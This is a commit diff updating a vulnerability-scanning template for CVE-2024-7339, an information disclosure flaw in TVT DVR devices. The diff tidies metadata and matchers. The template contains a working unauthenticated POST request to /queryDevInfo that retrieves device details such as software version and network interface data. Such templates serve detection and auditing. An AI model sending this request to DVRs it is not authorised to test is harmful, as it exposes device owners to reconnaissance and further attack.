Update CVE-2024-7339.yaml

2024-08-10 08:49:05 +05:30 · 2024-08-10 08:49:05 +05:30 · cee029a599
parent 598ad73b10
commit cee029a599
1 changed files with 9 additions and 12 deletions
--- a/CVE-2024-7339.yaml
+++ b/CVE-2024-7339.yaml
@ -1,7 +1,7 @@
 id: CVE-2024-7339

 info:
-  name: Sensitive Device Information Disclosure in TVT DVR
+  name: TVT DVR Sensitive Device Information - Disclosure
  author: Stuxctf
  severity: medium
  description: |
@ -23,27 +23,24 @@ info:
    cwe-id: CWE-200
    epss-score: 0.00045
    epss-percentile: 0.15505
+  tags: cve,cve2024,dvr,tvt

 http:
  - raw:
      - |
        POST /queryDevInfo HTTP/1.1
        Host: {{Hostname}}
-        Accept-Language: en-US,en;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Upgrade-Insecure-Requests: 1
-        Connection: keep-alive
-        User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari
-        Content-Length: 103

        <?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>
+
    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
      - type: word
        words:
          - "softwareVersion"
-          - "eth0"
+          - "eth0"
+        condition: and
+
+      - type: status
+        status:
+          - 200